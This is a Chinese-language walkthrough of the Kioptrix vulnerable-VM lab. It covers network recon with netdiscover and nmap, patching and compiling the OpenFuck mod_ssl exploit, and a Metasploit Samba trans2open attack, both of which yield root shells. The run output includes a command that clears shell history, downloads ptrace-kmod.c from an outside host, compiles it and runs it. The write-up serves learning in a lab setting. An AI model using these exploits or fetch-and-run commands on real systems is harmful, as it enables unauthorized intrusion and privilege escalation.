信息收集

通过netdiscover发现目标主机IP地址。

1
2
3
4
5
6
7
8
9
10
11
root@kali:~# netdiscover 

 Currently scanning: 192.168.63.0/16   |   Screen View: Unique Hosts         
                                                                             
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.43.1    ac:c1:ee:31:3f:25      1      60  Xiaomi Communications Co L
 192.168.43.33   44:03:2c:68:d8:0f      1      60  Intel Corporate           
 192.168.43.54   00:0c:29:7c:3a:16      1      60  VMware, Inc.

从扫描信息的得的目标主机的IP地址为192.168.43.54

nmap 扫描IP的端口信息nmap -A 192.168.43.54

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
root@kali:~# nmap -A -sS 192.168.43.54

Starting Nmap 7.10 ( https://nmap.org ) at 2018-05-07 15:48 
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.43.54
Host is up (0.00055s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1           1024/tcp  status
|_  100024  1           1024/udp  status
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/http    Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after:  2010-09-26T09:32:06
|_ssl-date: 2018-05-07T07:50:42+00:00; +1m50s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:7C:3A:16 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

TRACEROUTE
HOP RTT     ADDRESS
1   0.55 ms 192.168.43.54

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.99 seconds

443/tcp open ssl/http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)

443端口的服务mod_ssl/2.8.4 OpenSSL/0.9.6b

通过searchsploit mod_ssl查询相关漏洞

1
2
3
4
5
6
7
8
9
10
11
12
root@kali:~/Desktop# searchsploit mod_ssl
--------------------------------------- ----------------------------------------
 Exploit Title                         |  Path
                                       | (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Apache mod_ssl 2.0.x - Remote Denial o | exploits/linux/dos/24590.txt
Apache mod_ssl 2.8.x - Off-by-One HTAc | exploits/multiple/dos/21575.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'Open | exploits/unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'Open | exploits/unix/remote/764.c
Apache mod_ssl OpenSSL < 0.9.6d / < 0. | exploits/unix/remote/40347.txt
--------------------------------------- ----------------------------------------
Shellcodes: No Result

这里可以利用第4个漏洞的exp脚本进行攻击,exploit-db下载相关exp。

漏洞利用

OpenFuck漏洞利用

这是一个远程溢出的漏洞,下载的exp比较久远需要做一些修改。

  • 编译需要用的libssl-dev库,且版本为apt-get install libssl1.0-dev
  • 在exp中加入头文件<openssl/rc4.h><openssl/md5.h>
  • 替换exp中的wget后的url为http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
  • 第961行,修改为const unsigned char * p,* end;

然后编译

1
gcc -o OpenFuck 764.c -lcrypto

运行脚本./OpenFuck选择相应我系统版本

这里选择 0x6b

执行相关的命令./OpenFuck 0x6b 192.168.43.54

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
root@kali:~/Desktop# ./OpenFuck 0x6b 192.168.43.54

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f80e0
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ 
bash-2.05$ unset HISTFILE; cd /tmp; wget http://dl.packetstormsecurity.net/030exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; 
--04:04:37--  http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:80... connected!
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c [following]
--04:04:38--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]

    0K ...                                                   100% @   3.74 MB/s

04:04:39 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]

[+] Attached to 6498
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
whoami
root

Samba漏洞利用

实验环境是存在一个samba漏洞的,

这里用到enum4linux其利用SMB协议枚举Windows系统和SAMBA服务,以此来获得目标系统大量的重要信息,其枚举结果可能包含目标系统的用户帐号、组帐号、共享目录、密码策略等机密重要信息。

但我本地环境没有检测到samba的版本

该漏洞为Samba trans2open溢出(Linux x86)在Samba 2.2.0到2.2.8版本中发现的缓冲区溢出.

同样可以在searchsploit查到

这里直接用msf环境进行实验。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
msf exploit(linux/samba/trans2open) > show options 

Module options (exploit/linux/samba/trans2open):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.43.54   yes       The target address
   RPORT  139              yes       The target port (TCP)


Payload options (linux/x86/shell_bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  192.168.43.54   no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Samba 2.2.x - Bruteforce

msf exploit(linux/samba/trans2open) > exploit

[*] Started bind handler
[*] 192.168.43.54:139 - Trying return address 0xbffffdfc...
[*] 192.168.43.54:139 - Trying return address 0xbffffcfc...
[*] 192.168.43.54:139 - Trying return address 0xbffffbfc...
[*] 192.168.43.54:139 - Trying return address 0xbffffafc...
[*] Command shell session 2 opened (192.168.43.177:33375 -> 192.168.43.54:4444) at 2018-05-07 04:47:42 -0400

id
uid=0(root) gid=0(root) groups=99(nobody)

总结

虽然说这个实验环境比较老,一些漏洞可能在现实的实战中是很少存在的。但是在这个漏洞利用的过程中可以学到一些kali linux的工具的利用和一些实战的思路。